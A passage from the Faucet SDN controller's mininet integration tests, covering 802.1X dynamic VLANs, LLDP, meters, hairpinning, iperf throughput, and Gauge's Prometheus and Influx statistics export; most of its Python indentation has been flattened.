actions=['POP_VLAN', 'OUTPUT:%s' % port_no1, 'OUTPUT:%s' % port_no3])
self.wait_until_matching_flow(
{'vlan_vid': vid},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no2])
self.wait_until_no_matching_flow(
{'vlan_vid': radius_vid2},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no1, 'OUTPUT:%s' % port_no2])
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=True)
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=True))
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
# check ports are back in the right vlans.
self.wait_until_no_matching_flow(
{'in_port': port_no1},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:%u}' % radius_vid1])
self.wait_until_matching_flow(
{'in_port': port_no1},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:%u}' % vid])
# check flood ports are in the right vlans
self.wait_until_no_matching_flow(
{'vlan_vid': radius_vid1},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no1, 'OUTPUT:%s' % port_no3])
self.wait_until_matching_flow(
{'vlan_vid': vid},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no1, 'OUTPUT:%s' % port_no2])
        # Check that two 802.1X hosts can talk to each other (same dynamic VLAN).
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=True)
self.one_ipv4_ping(
self.eapol1_host, self.eapol2_host.IP(),
require_host_learned=False, expected_result=False)
self.assertTrue(self.try_8021x(
self.eapol2_host, port_no2, self.wpasupplicant_conf_1, and_logoff=False))
self.one_ipv4_ping(
self.eapol2_host, self.ping_host.IP(),
require_host_learned=False, expected_result=True)
self.one_ipv4_ping(
self.eapol2_host, self.eapol1_host.IP(),
require_host_learned=False, expected_result=True)
        # Check that two 802.1X hosts cannot talk to each other (different dynamic VLANs).
self.assertTrue(self.try_8021x(
self.eapol2_host, port_no2, self.wpasupplicant_conf_2, and_logoff=False))
self.one_ipv4_ping(
self.eapol2_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.one_ipv4_ping(
self.eapol2_host, self.eapol1_host.IP(),
require_host_learned=False, expected_result=False)
# move host1 to new VLAN
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_2, and_logoff=False))
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.one_ipv4_ping(
self.eapol1_host, self.eapol2_host.IP(),
require_host_learned=False, expected_result=True)
self.wait_until_no_matching_flow(
{'eth_src': self.eapol1_host.MAC(),
'vlan_vid': vid},
table_id=self._ETH_SRC_TABLE)
self.wait_until_no_matching_flow(
{'eth_src': self.eapol1_host.MAC(),
'vlan_vid': radius_vid1},
table_id=self._ETH_SRC_TABLE)
self.wait_until_matching_flow(
{'eth_src': self.eapol1_host.MAC(),
'vlan_vid': radius_vid2},
table_id=self._ETH_SRC_TABLE)
self.wait_until_no_matching_flow(
{'eth_dst': self.eapol1_host.MAC(),
'vlan_vid': vid},
table_id=self._ETH_DST_TABLE)
self.wait_until_no_matching_flow(
{'eth_dst': self.eapol1_host.MAC(),
'vlan_vid': radius_vid1},
table_id=self._ETH_DST_TABLE)
self.wait_until_matching_flow(
{'eth_dst': self.eapol1_host.MAC(),
'vlan_vid': radius_vid2},
table_id=self._ETH_DST_TABLE)
# test port up/down. removes the dynamic vlan & host cache.
self.flap_port(port_no2)
self.wait_until_no_matching_flow(
{'eth_src': self.eapol2_host.MAC()},
table_id=self._ETH_SRC_TABLE)
self.wait_until_no_matching_flow(
{'eth_dst': self.eapol2_host.MAC(),
'vlan_vid': radius_vid1},
table_id=self._ETH_DST_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no2])
# check ports are back in the right vlans.
self.wait_until_no_matching_flow(
{'in_port': port_no2},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:%u}' % radius_vid2])
self.wait_until_matching_flow(
{'in_port': port_no2},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:%u}' % vid])
# check flood ports are in the right vlans
self.wait_until_no_matching_flow(
{'vlan_vid': radius_vid2},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no1, 'OUTPUT:%s' % port_no2])
self.wait_until_matching_flow(
{'vlan_vid': vid},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no2])
self.post_test_checks()
class FaucetUntaggedRandomVidTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
randvlan:
vid: 100
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: randvlan
%(port_2)d:
native_vlan: randvlan
%(port_3)d:
native_vlan: randvlan
%(port_4)d:
native_vlan: randvlan
"""
def test_untagged(self):
last_vid = None
for _ in range(5):
vid = random.randint(2, mininet_test_base.MAX_TEST_VID)
if vid == last_vid:
continue
self.change_vlan_config(
'randvlan', 'vid', vid, cold_start=True, hup=True)
self.ping_all_when_learned()
last_vid = vid
class FaucetUntaggedNoCombinatorialFlood(FaucetUntaggedTest):
CONFIG = """
combinatorial_port_flood: False
""" + CONFIG_BOILER_UNTAGGED
class FaucetUntaggedControllerNfvTest(FaucetUntaggedTest):
# Name of switch interface connected to last host, accessible to controller.
last_host_switch_intf = None
def _init_faucet_config(self):
last_host = self.hosts_name_ordered()[-1]
switch = self.first_switch()
last_host_switch_link = switch.connectionsTo(last_host)[0]
self.last_host_switch_intf = [intf for intf in last_host_switch_link if intf in switch.intfList()][0]
# Now that interface is known, FAUCET config can be written to include it.
super(FaucetUntaggedControllerNfvTest, self)._init_faucet_config()
def test_untagged(self):
super(FaucetUntaggedControllerNfvTest, self).test_untagged()
# Confirm controller can see switch interface with traffic.
ifconfig_output = self.net.controllers[0].cmd('ifconfig %s' % self.last_host_switch_intf)
self.assertTrue(
re.search('(R|T)X packets[: ][1-9]', ifconfig_output),
msg=ifconfig_output)
class FaucetUntaggedBroadcastTest(FaucetUntaggedTest):
def test_untagged(self):
super(FaucetUntaggedBroadcastTest, self).test_untagged()
self.verify_broadcast()
self.verify_no_bcast_to_self()
self.verify_unicast_not_looped()
class FaucetUntaggedNSLoopTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
acls:
nsonly:
- rule:
dl_type: %u
ip_proto: 58
icmpv6_type: 135
actions:
allow: 1
- rule:
actions:
allow: 0
vlans:
100:
description: "untagged"
""" % IPV6_ETH
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: nsonly
%(port_2)d:
native_vlan: 100
acl_in: nsonly
%(port_3)d:
native_vlan: 100
acl_in: nsonly
%(port_4)d:
native_vlan: 100
acl_in: nsonly
"""
def test_untagged(self):
self.verify_no_bcast_to_self()
class FaucetUntaggedNoCombinatorialBroadcastTest(FaucetUntaggedBroadcastTest):
CONFIG = """
combinatorial_port_flood: False
""" + CONFIG_BOILER_UNTAGGED
class FaucetExperimentalAPITest(FaucetUntaggedTest):
"""Test the experimental Faucet API."""
CONTROLLER_CLASS = mininet_test_topo.FaucetExperimentalAPI
results_file = None
def _set_static_vars(self):
super(FaucetExperimentalAPITest, self)._set_static_vars()
self._set_var_path('faucet', 'API_TEST_RESULT', 'result.txt')
self.results_file = self.env['faucet']['API_TEST_RESULT']
def test_untagged(self):
self.wait_until_matching_lines_from_file(r'.*pass.*', self.results_file)
class FaucetUntaggedLogRotateTest(FaucetUntaggedTest):
def test_untagged(self):
faucet_log = self.env['faucet']['FAUCET_LOG']
self.assertTrue(os.path.exists(faucet_log))
os.rename(faucet_log, faucet_log + '.old')
self.assertTrue(os.path.exists(faucet_log + '.old'))
self.flap_all_switch_ports()
self.assertTrue(os.path.exists(faucet_log))
class FaucetUntaggedLLDPTest(FaucetUntaggedTest):
CONFIG = """
lldp_beacon:
send_interval: 5
max_per_interval: 5
interfaces:
%(port_1)d:
native_vlan: 100
lldp_beacon:
enable: True
system_name: "faucet"
port_descr: "first_port"
org_tlvs:
- {oui: 0x12bb, subtype: 2, info: "01406500"}
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
@staticmethod
def wireshark_payload_format(payload_str):
formatted_payload_str = ''
groupsize = 4
for payload_offset in range(len(payload_str) // groupsize):
char_count = payload_offset * 2
if char_count % 0x10 == 0:
formatted_payload_str += '0x%4.4x: ' % char_count
payload_fragment = payload_str[payload_offset * groupsize:][:groupsize]
formatted_payload_str += ' ' + payload_fragment
return formatted_payload_str
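    # Illustrative output (sketch): hex characters are grouped in fours behind a
    # wireshark-style offset prefix, e.g.
    #   wireshark_payload_format('0e00000000000001')
    #   -> '0x0000:  0e00 0000 0000 0001'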
def test_untagged(self):
first_host = self.hosts_name_ordered()[0]
tcpdump_filter = 'ether proto 0x88cc'
timeout = 5 * 3
tcpdump_txt = self.tcpdump_helper(
first_host, tcpdump_filter, [
lambda: first_host.cmd('sleep %u' % timeout)],
timeout=timeout, vflags='-vv', packets=1)
oui_prefix = ''.join(self.FAUCET_MAC.split(':')[:3])
faucet_lldp_dp_id_attr = '%2.2x' % 1
expected_lldp_dp_id = ''.join((
oui_prefix,
faucet_lldp_dp_id_attr,
binascii.hexlify(str(self.dpid).encode('UTF-8')).decode()))
for lldp_required in (
r'%s > 01:80:c2:00:00:0e, ethertype LLDP' % self.FAUCET_MAC,
r'Application type \[voice\] \(0x01\), Flags \[Tagged\]Vlan id 50',
r'System Name TLV \(5\), length 6: faucet',
r'Port Description TLV \(4\), length 10: first_port',
self.wireshark_payload_format(expected_lldp_dp_id)):
self.assertTrue(
re.search(lldp_required, tcpdump_txt),
msg='%s: %s' % (lldp_required, tcpdump_txt))
class FaucetUntaggedLLDPDefaultFallbackTest(FaucetUntaggedTest):
CONFIG = """
lldp_beacon:
send_interval: 5
max_per_interval: 5
interfaces:
%(port_1)d:
native_vlan: 100
lldp_beacon:
enable: True
org_tlvs:
- {oui: 0x12bb, subtype: 2, info: "01406500"}
"""
def test_untagged(self):
first_host = self.hosts_name_ordered()[0]
tcpdump_filter = 'ether proto 0x88cc'
timeout = 5 * 3
tcpdump_txt = self.tcpdump_helper(
first_host, tcpdump_filter, [
lambda: first_host.cmd('sleep %u' % timeout)],
timeout=timeout, vflags='-vv', packets=1)
for lldp_required in (
r'%s > 01:80:c2:00:00:0e, ethertype LLDP' % self.FAUCET_MAC,
r'Application type \[voice\] \(0x01\), Flags \[Tagged\]Vlan id 50',
r'System Name TLV \(5\), length 8: faucet-1',
r'Port Description TLV \(4\), length [1-9]: b%u' % self.port_map['port_1']):
self.assertTrue(
re.search(lldp_required, tcpdump_txt),
msg='%s: %s' % (lldp_required, tcpdump_txt))
class FaucetUntaggedMeterParseTest(FaucetUntaggedTest):
REQUIRES_METERS = True
OVS_TYPE = 'user'
CONFIG_GLOBAL = """
meters:
lossymeter:
meter_id: 1
entry:
flags: "KBPS"
bands:
[
{
type: "DROP",
rate: 100
}
]
acls:
lossyacl:
- rule:
actions:
meter: lossymeter
allow: 1
vlans:
100:
description: "untagged"
"""
def get_gauge_watcher_config(self):
return """
port_stats:
dps: ['%s']
type: 'port_stats'
interval: 5
db: 'stats_file'
port_state:
dps: ['%s']
type: 'port_state'
interval: 5
db: 'state_file'
meter_stats:
dps: ['%s']
type: 'meter_stats'
interval: 5
db: 'meter_file'
meter_stats_prom:
dps: ['%s']
type: 'meter_stats'
db: 'prometheus'
interval: 5
""" % (self.DP_NAME, self.DP_NAME, self.DP_NAME, self.DP_NAME)
GAUGE_CONFIG_DBS = """
prometheus:
type: 'prometheus'
prometheus_addr: '::1'
prometheus_port: %(gauge_prom_port)d
"""
config_ports = {'gauge_prom_port': None}
def get_gauge_config(self, faucet_config_file,
monitor_stats_file,
monitor_state_file,
monitor_meter_stats_file):
"""Build Gauge config."""
return """
faucet_configs:
- %s
watchers:
%s
dbs:
stats_file:
type: 'text'
file: %s
state_file:
type: 'text'
file: %s
meter_file:
type: 'text'
file: %s
%s
""" % (faucet_config_file, self.get_gauge_watcher_config(),
monitor_stats_file, monitor_state_file, monitor_meter_stats_file,
self.GAUGE_CONFIG_DBS)
def _init_gauge_config(self):
gauge_config = self.get_gauge_config(
self.faucet_config_path,
self.monitor_stats_file,
self.monitor_state_file,
self.monitor_meter_stats_file)
if self.config_ports:
gauge_config = gauge_config % self.config_ports
self._write_yaml_conf(self.gauge_config_path, yaml.safe_load(gauge_config))
def test_untagged(self):
"""All hosts on the same untagged VLAN should have connectivity."""
# TODO: userspace DP port status not reliable.
self.ping_all_when_learned()
class FaucetUntaggedApplyMeterTest(FaucetUntaggedMeterParseTest):
CONFIG = """
interfaces:
%(port_1)d:
acl_in: lossyacl
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
super(FaucetUntaggedApplyMeterTest, self).test_untagged()
first_host, second_host = self.hosts_name_ordered()[:2]
error('metered ping flood: %s' % first_host.cmd(
'ping -c 1000 -f %s' % second_host.IP()))
# Require meter band bytes to match.
self.wait_until_matching_lines_from_file(
r'.+faucet-1-1-byte-band-count.+[1-9].+',
self.monitor_meter_stats_file)
meter_labels = {
'dp_id': self.dpid,
'dp_name': self.DP_NAME,
'meter_id': 1
}
byte_band_count = self.scrape_prometheus_var(
'of_meter_byte_band_count', labels=meter_labels, controller='gauge')
self.assertTrue(byte_band_count)
class FaucetUntaggedMeterAddTest(FaucetUntaggedMeterParseTest):
def test_untagged(self):
super(FaucetUntaggedMeterAddTest, self).test_untagged()
conf = self._get_faucet_conf()
del conf['acls']
conf['meters']['lossymeter2'] = {
'meter_id': 2,
'entry': {
'flags': ['PKTPS'],
'bands': [{'rate': '1000', 'type': 'DROP'}]
},
}
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=False, change_expected=True, hup=True)
self.wait_until_matching_lines_from_file(
r'.+\'meter_id\'\: 2+',
self.get_matching_meters_on_dpid(self.dpid))
class FaucetUntaggedMeterDeleteTest(FaucetUntaggedMeterParseTest):
def test_untagged(self):
super(FaucetUntaggedMeterDeleteTest, self).test_untagged()
conf = self._get_faucet_conf()
del conf['meters']['lossymeter']
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=False, change_expected=True)
self.wait_until_no_matching_lines_from_file(
r'.+meter_id+',
self.get_matching_meters_on_dpid(self.dpid))
class FaucetUntaggedMeterModTest(FaucetUntaggedMeterParseTest):
def test_untagged(self):
super(FaucetUntaggedMeterModTest, self).test_untagged()
conf = self._get_faucet_conf()
del conf['acls']
conf['meters']['lossymeter'] = {
'meter_id': 1,
'entry': {
'flags': ['PKTPS'],
'bands': [{'rate': '1000', 'type': 'DROP'}]
},
}
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=False, change_expected=True, hup=True)
self.wait_until_matching_lines_from_file(
r'.+PKTPS+',
self.get_matching_meters_on_dpid(self.dpid))
class FaucetUntaggedHairpinTest(FaucetUntaggedTest):
NETNS = True
CONFIG = """
interfaces:
%(port_1)d:
hairpin: True
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# Create macvlan interfaces, with one in a separate namespace,
# to force traffic between them to be hairpinned via FAUCET.
first_host, second_host = self.hosts_name_ordered()[:2]
macvlan1_intf = 'macvlan1'
macvlan1_ipv4 = '10.0.0.100'
macvlan2_intf = 'macvlan2'
macvlan2_ipv4 = '10.0.0.101'
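# VEPA mode sends all macvlan traffic out the physical port, so frames between the
# two macvlans must be hairpinned back by the switch.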
self.add_macvlan(first_host, macvlan1_intf, ipa=macvlan1_ipv4, mode='vepa')
self.add_macvlan(first_host, macvlan2_intf, mode='vepa')
macvlan2_mac = self.get_host_intf_mac(first_host, macvlan2_intf)
netns = self.hostns(first_host)
setup_cmds = []
setup_cmds.extend(
['ip link set %s netns %s' % (macvlan2_intf, netns)])
for exec_cmd in (
('ip address add %s/24 brd + dev %s' % (
macvlan2_ipv4, macvlan2_intf),
'ip link set %s up' % macvlan2_intf)):
setup_cmds.append('ip netns exec %s %s' % (netns, exec_cmd))
self.quiet_commands(first_host, setup_cmds)
self.one_ipv4_ping(first_host, macvlan2_ipv4, intf=macvlan1_ipv4)
self.one_ipv4_ping(first_host, second_host.IP())
# Verify OUTPUT:IN_PORT flood rules are exercised.
self.wait_nonzero_packet_count_flow(
{'in_port': self.port_map['port_1'],
'dl_dst': 'ff:ff:ff:ff:ff:ff'},
table_id=self._FLOOD_TABLE, actions=['OUTPUT:IN_PORT'])
self.wait_nonzero_packet_count_flow(
{'in_port': self.port_map['port_1'],
'dl_dst': macvlan2_mac},
table_id=self._ETH_DST_HAIRPIN_TABLE, actions=['OUTPUT:IN_PORT'])
class FaucetUntaggedGroupHairpinTest(FaucetUntaggedHairpinTest):
CONFIG = """
group_table: True
interfaces:
%(port_1)d:
hairpin: True
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
class FaucetUntaggedTcpIPv4IperfTest(FaucetUntaggedTest):
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
first_host_ip = ipaddress.ip_address(first_host.IP())
second_host_ip = ipaddress.ip_address(second_host.IP())
for _ in range(3):
self.ping_all_when_learned()
self.verify_iperf_min(
((first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])),
MIN_MBPS, first_host_ip, second_host_ip,
sync_counters_func=lambda: self.one_ipv4_ping(first_host, second_host_ip))
self.flap_all_switch_ports()
class FaucetUntaggedTcpIPv6IperfTest(FaucetUntaggedTest):
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
first_host_ip = ipaddress.ip_interface('fc00::1:1/112')
second_host_ip = ipaddress.ip_interface('fc00::1:2/112')
self.add_host_ipv6_address(first_host, first_host_ip)
self.add_host_ipv6_address(second_host, second_host_ip)
for _ in range(3):
self.ping_all_when_learned()
self.verify_iperf_min(
((first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])),
MIN_MBPS, first_host_ip.ip, second_host_ip.ip,
sync_counters_func=lambda: self.one_ipv6_ping(first_host, second_host_ip.ip))
self.flap_all_switch_ports()
class FaucetSanityTest(FaucetUntaggedTest):
"""Sanity test - make sure test environment is correct before running all tess."""
def verify_dp_port_healthy(self, dp_port, retries=5, min_mbps=MIN_MBPS):
for _ in range(retries):
port_desc = self.get_port_desc_from_dpid(self.dpid, dp_port)
port_name = port_desc['name']
port_state = port_desc['state']
port_config = port_desc['config']
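# OpenFlow reports curr_speed in kbps; convert to Mbps for comparison against min_mbps.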
port_speed_mbps = (port_desc['curr_speed'] * 1e3) / 1e6
error('DP port %u is %s, at %u Mbps\n' % (dp_port, port_name, port_speed_mbps))
if port_speed_mbps < min_mbps:
error('port speed %u below minimum %u mbps\n' % (
port_speed_mbps, min_mbps))
elif port_config != 0:
error('port config %u must be 0 (all clear)\n' % port_config)
elif port_state not in (0, 4):
error('state %u must be 0 (all flags clear or live)\n' % (
port_state))
else:
return
time.sleep(1)
self.fail('DP port %u not healthy (%s)' % (dp_port, port_desc))
def test_portmap(self):
prom_desc = self.scrape_prometheus(
controller='faucet', var='of_dp_desc_stats')
self.assertIsNotNone(prom_desc, msg='Cannot scrape of_dp_desc_stats')
error('DP: %s\n' % prom_desc[0])
error('port_map: %s\n' % self.port_map)
for i, host in enumerate(self.hosts_name_ordered(), start=1):
in_port = 'port_%u' % i
dp_port = self.port_map[in_port]
if dp_port in self.switch_map:
error('verifying cabling for %s: host %s -> dp %u\n' % (
in_port, self.switch_map[dp_port], dp_port))
else:
error('verifying host %s -> dp %s\n' % (
in_port, dp_port))
self.verify_dp_port_healthy(dp_port)
self.require_host_learned(host, in_port=dp_port)
learned = self.prom_macs_learned()
self.assertEqual(
len(self.hosts_name_ordered()), len(learned),
msg='test requires exactly %u hosts learned (got %s)' % (
len(self.hosts_name_ordered()), learned))
def test_listening(self):
msg_template = (
'Processes listening on test interfaces, or on all interfaces, may interfere with tests. '
'Please deconfigure them (e.g. configure interface as "unmanaged"):\n\n%s')
controller = self._get_controller()
ss_out = controller.cmd('ss -lnep').splitlines()
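# Match sockets bound to wildcard addresses (*:port or :::port), i.e. processes listening on all interfaces.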
listening_all_re = re.compile(r'^.+\s+(\*:\d+|:::\d+)\s+(:+\*|\*:\*).+$')
listening_all = [line for line in ss_out if listening_all_re.match(line)]
for test_intf in list(self.switch_map.values()):
int_re = re.compile(r'^.+\b%s\b.+$' % test_intf)
listening_int = [line for line in ss_out if int_re.match(line)]
self.assertFalse(
len(listening_int),
msg=(msg_template % '\n'.join(listening_int)))
if listening_all:
print('Warning: %s' % (msg_template % '\n'.join(listening_all)))
def test_silence(self):
# Make all test hosts silent and ensure we hear no other packets.
for host in self.hosts_name_ordered():
self.host_drop_all_ips(host)
host.cmd('echo 1 > /proc/sys/net/ipv6/conf/%s/disable_ipv6' % host.defaultIntf())
for host in self.hosts_name_ordered():
tcpdump_filter = ''
tcpdump_txt = self.tcpdump_helper(
host, tcpdump_filter, [], timeout=10, vflags='-vv', packets=1)
self.assertTrue(
self.tcpdump_rx_packets(tcpdump_txt, 0),
msg='got unexpected packet from test switch: %s' % tcpdump_txt)
class FaucetUntaggedPrometheusGaugeTest(FaucetUntaggedTest):
"""Testing Gauge Prometheus"""
GAUGE_CONFIG_DBS = """
prometheus:
type: 'prometheus'
prometheus_addr: '::1'
prometheus_port: %(gauge_prom_port)d
"""
config_ports = {'gauge_prom_port': None}
def get_gauge_watcher_config(self):
return """
port_stats:
dps: ['%s']
type: 'port_stats'
interval: 5
db: 'prometheus'
port_state:
dps: ['%s']
type: 'port_state'
interval: 5
db: 'prometheus'
flow_table:
dps: ['%s']
type: 'flow_table'
interval: 5
db: 'prometheus'
""" % (self.DP_NAME, self.DP_NAME, self.DP_NAME)
def _start_gauge_check(self):
if not self.gauge_controller.listen_port(self.config_ports['gauge_prom_port']):
return 'gauge not listening on prometheus port'
return None
def test_untagged(self):
self.wait_dp_status(1, controller='gauge')
self.assertIsNotNone(self.scrape_prometheus_var(
'faucet_pbr_version', any_labels=True, controller='gauge', retries=3))
conf = self._get_faucet_conf()
cookie = conf['dps'][self.DP_NAME]['cookie']
if not self.wait_ports_updating(self.port_map.keys(), self.PORT_VARS):
self.fail(msg='Gauge Prometheus port counters not increasing')
for _ in range(self.DB_TIMEOUT * 3):
updated_counters = True
for host in self.hosts_name_ordered():
host_labels = {
'dp_id': self.dpid,
'dp_name': self.DP_NAME,
'cookie': cookie,
'eth_dst': host.MAC(),
'inst_count': str(1),
'table_id': str(self._ETH_DST_TABLE),
'vlan': str(100),
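# vlan_vid 4196 is VLAN 100 with the OFPVID_PRESENT bit (0x1000) set.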
'vlan_vid': str(4196)
}
packet_count = self.scrape_prometheus_var(
'flow_packet_count_eth_dst', labels=host_labels, controller='gauge')
byte_count = self.scrape_prometheus_var(
'flow_byte_count_eth_dst', labels=host_labels, controller='gauge')
if packet_count is None or packet_count == 0:
updated_counters = False
if byte_count is None or byte_count == 0:
updated_counters = False
if updated_counters:
return
time.sleep(1)
self.fail(msg='Gauge Prometheus flow counters not increasing')
class FaucetUntaggedInfluxTest(FaucetUntaggedTest):
"""Basic untagged VLAN test with Influx."""
GAUGE_CONFIG_DBS = """
influx:
type: 'influx'
influx_db: 'faucet'
influx_host: '127.0.0.1'
influx_port: %(gauge_influx_port)d
influx_user: 'faucet'
influx_pwd: ''
influx_retries: 1
""" + """
influx_timeout: %u
""" % FaucetUntaggedTest.DB_TIMEOUT
config_ports = {'gauge_influx_port': None}
influx_log = None
server_thread = None
server = None
def get_gauge_watcher_config(self):
return """
port_stats:
dps: ['%s']
type: 'port_stats'
interval: 2
db: 'influx'
port_state:
dps: ['%s']
type: 'port_state'
interval: 2
db: 'influx'
flow_table:
dps: ['%s']
type: 'flow_table'
interval: 2
db: 'influx'
""" % (self.DP_NAME, self.DP_NAME, self.DP_NAME)
def setup_influx(self):
self.influx_log = os.path.join(self.tmpdir, 'influx.log')
if self.server:
self.server.influx_log = self.influx_log
self.server.timeout = self.DB_TIMEOUT
def setUp(self): # pylint: disable=invalid-name
self.handler = InfluxPostHandler
super(FaucetUntaggedInfluxTest, self).setUp()
self.setup_influx()
def tearDown(self, ignore_oferrors=False): # pylint: disable=invalid-name
if self.server:
self.server.shutdown()
self.server.socket.close()
super(FaucetUntaggedInfluxTest, self).tearDown(ignore_oferrors=ignore_oferrors)
def _wait_error_shipping(self, timeout=None):
if timeout is None:
timeout = self.DB_TIMEOUT * 3 * 2
gauge_log_name = self.env['gauge']['GAUGE_LOG']
self.wait_until_matching_lines_from_file(
r'.+error shipping.+', gauge_log_name, timeout=timeout)
def _verify_influx_log(self, retries=3):
self.assertTrue(os.path.exists(self.influx_log))
expected_vars = {
'dropped_in', 'dropped_out', 'bytes_out', 'flow_packet_count',
'errors_in', 'errors_out', 'bytes_in', 'flow_byte_count',
'port_state_reason', 'packets_in', 'packets_out'}
observed_vars = set()
for _ in range(retries):
with open(self.influx_log) as influx_log:
influx_log_lines = influx_log.readlines()
for point_line in influx_log_lines:
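# Each Influx line-protocol point is 'measurement,tag1=v1,... field=value timestamp', i.e. three space-separated fields.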
point_fields = point_line.strip().split()
self.assertEqual(3, len(point_fields), msg=point_fields)
ts_name, value_field, _ = point_fields
value = float(value_field.split('=')[1])
ts_name_fields = ts_name.split(',')
self.assertGreater(len(ts_name_fields), 1)
observed_vars.add(ts_name_fields[0])
label_values = {}
for label_value in ts_name_fields[1:]:
label, value = label_value.split('=')
label_values[label] = value
if ts_name.startswith('flow'):
self.assertTrue('inst_count' in label_values, msg=point_line)
if 'vlan_vid' in label_values:
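# The vlan label should equal vlan_vid with the OFPVID_PRESENT bit (0x1000) stripped.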
self.assertEqual(
int(label_values['vlan']), int(label_values['vlan_vid']) ^ 0x1000)
if expected_vars == observed_vars:
break
time.sleep(1)
self.assertEqual(expected_vars, observed_vars)
self.verify_no_exception(self.env['gauge']['GAUGE_EXCEPTION_LOG'])
def _wait_influx_log(self):
for _ in range(self.DB_TIMEOUT * 3):
if os.path.exists(self.influx_log):
return
time.sleep(1)
def _start_gauge_check(self):
influx_port = self.config_ports['gauge_influx_port']
try:
self.server = QuietHTTPServer(
(mininet_test_util.LOCALHOST, influx_port),
self.handler) # pytype: disable=attribute-error
self.server.timeout = self.DB_TIMEOUT
self.server_thread = threading.Thread(
target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
return None
except socket.error as err:
return 'cannot start Influx test server: %s' % err
def test_untagged(self):
self.ping_all_when_learned()
self.hup_gauge()
self.flap_all_switch_ports()
self._wait_influx_log()
self._verify_influx_log()
class FaucetUntaggedMultiDBWatcherTest(
FaucetUntaggedInfluxTest, FaucetUntaggedPrometheusGaugeTest):
GAUGE_CONFIG_DBS = """
prometheus:
type: 'prometheus'
prometheus_addr: '::1'
prometheus_port: %(gauge_prom_port)d
influx:
type: 'influx'
influx_db: 'faucet'
influx_host: '127.0.0.1'
influx_port: %(gauge_influx_port)d
influx_user: 'faucet'
influx_pwd: ''
influx_retries: 1
""" + """
influx_timeout: %u
""" % FaucetUntaggedTest.DB_TIMEOUT
config_ports = {
'gauge_prom_port': None,
'gauge_influx_port': None}
def get_gauge_watcher_config(self):
return """
port_stats:
dps: ['%s']
type: 'port_stats'
interval: 5
dbs: ['prometheus', 'influx']
port_state:
dps: ['%s']
type: 'port_state'
interval: 5
dbs: ['prometheus', 'influx']
flow_table:
dps: ['%s']
type: 'flow_table'
interval: 5
dbs: ['prometheus', 'influx']
""" % (self.DP_NAME, self.DP_NAME, self.DP_NAME)
@staticmethod
def test_tagged():
return
def test_untagged(self):
self.wait_dp_status(1, controller='gauge')
self.assertTrue(self.wait_ports_updating(self.port_map.keys(), self.PORT_VARS))
self.ping_all_when_learned()
self.hup_gauge()
self.flap_all_switch_ports()
self._wait_influx_log()
self._verify_influx_log()
class FaucetUntaggedInfluxDownTest(FaucetUntaggedInfluxTest):
def _start_gauge_check(self):
return None
def test_untagged(self):
self.ping_all_when_learned()
self._wait_error_shipping()
self.verify_no_exception(self.env['gauge']['GAUGE_EXCEPTION_LOG'])
class FaucetUntaggedInfluxUnreachableTest(FaucetUntaggedInfluxTest):
GAUGE_CONFIG_DBS = """
influx:
type: 'influx'
influx_db: 'faucet'
influx_host: '127.0.0.2'
influx_port: %(gauge_influx_port)d
influx_user: 'faucet'
influx_pwd: ''
influx_timeout: 2
"""
def _start_gauge_check(self):
return None
def test_untagged(self):
self.gauge_controller.cmd(
'route add 127.0.0.2 gw 127.0.0.1 lo')
self.ping_all_when_learned()
self._wait_error_shipping()
self.verify_no_exception(self.env['gauge']['GAUGE_EXCEPTION_LOG'])
class FaucetSingleUntaggedInfluxTooSlowTest(FaucetUntaggedInfluxTest):
def setUp(self): # pylint: disable=invalid-name
self.handler = SlowInfluxPostHandler
super().setUp()
self.setup_influx()
def test_untagged(self):
self.ping_all_when_learned()
self._wait_influx_log()
self.assertTrue(os.path.exists(self.influx_log))
self._wait_error_shipping()
self.verify_no_exception(self.env['gauge']['GAUGE_EXCEPTION_LOG'])
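# 'Nailed' forwarding: ACL output actions forward unicast and ARP between ports 1 and 2 only;
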